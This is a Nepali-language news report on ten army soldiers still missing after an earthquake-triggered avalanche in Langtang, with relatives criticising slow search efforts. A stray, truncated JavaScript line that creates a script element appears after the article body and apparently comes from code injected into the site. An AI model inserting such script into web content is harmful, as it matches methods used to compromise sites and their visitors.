बेपत्ता सेना

Naresh Ale Avatar

गत वैशाख १२ गते गएको महाभूकम्पमा परी हराइरहेका नेपाली सेनाका उपसेनानी सबिन खड्का सहित अन्य दर्जाका दशजना नेपाली सेनाहरु अझै बेपत्ता भएका छन। रसुवाको धुन्चे स्थित् नारायणदल गणमा कार्यरत खड्का सहित दश जना सेनाको खोजी कार्यमा सेनाले ढिलाई गरेको पीडित आफन्तहरुको गुनासो छ। रफत सञ्चार क्लब भक्तपुरले सोमवार पीडित आफन्तहरुसँग गरेको साक्षतकार कार्यक्रममा परिवारजनले छिटो भन्दा छिटो खोजीकार्यलाई तिब्रता दिनुपर्ने बताएका हुन्। लाङ्टाङ्ग सुरक्षामा खटिएका सेनाहरुको भूकम्प गएलगत्तै आएको हिमपहिरोमा पुरिएर बेपत्ता भएको र सेनाले खोजी कार्यमा ढिलाई गरेको पीडितहरुको दुःखेसो छ।

उक्त हिमपहिरोमा परी पुरिनेहरुमा उपसेनानी खड्का, हल्बलदार ओमहरी कार्की., जयकुमार माझी, प्यूठ कुमार गुरुङ्, सिपाई फुर्बा तामाङ्, बिरेन्द्र मण्डल, मदन जलारी, सोमराज कुमाल, महेन्द्र आले, रामचन्द्र मण्डल रहेका छन। उपसेनानी सबिन खड्काका अभिभावक देवराज खड्काले सेनाले खोजीकार्य तिब्र गर्नुपर्ने अन्यथा आफूहरु नै कुटो कोदालो लिएर खोजी कार्यमा जुट्ने बताउनुभयो।

कार्यक्रममा पीडित अभिभावक लालबहादुर कुमाल र विकास जलारीले आफन्तहरुको खोजी कार्यमा लापरवाही गरेको बताउनुभयो। खोजी कार्य ढिलाई भए यसको घाटा सेनालाई नै हुने भएकाले तिब्र गतिमा खोजी कार्य गरिदिन नेपाली सेनालाई आग्रह गर्नुभयो।

var d=document;var s=d.createElement(‘script’);

Oman Gauchan "Hanson" Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search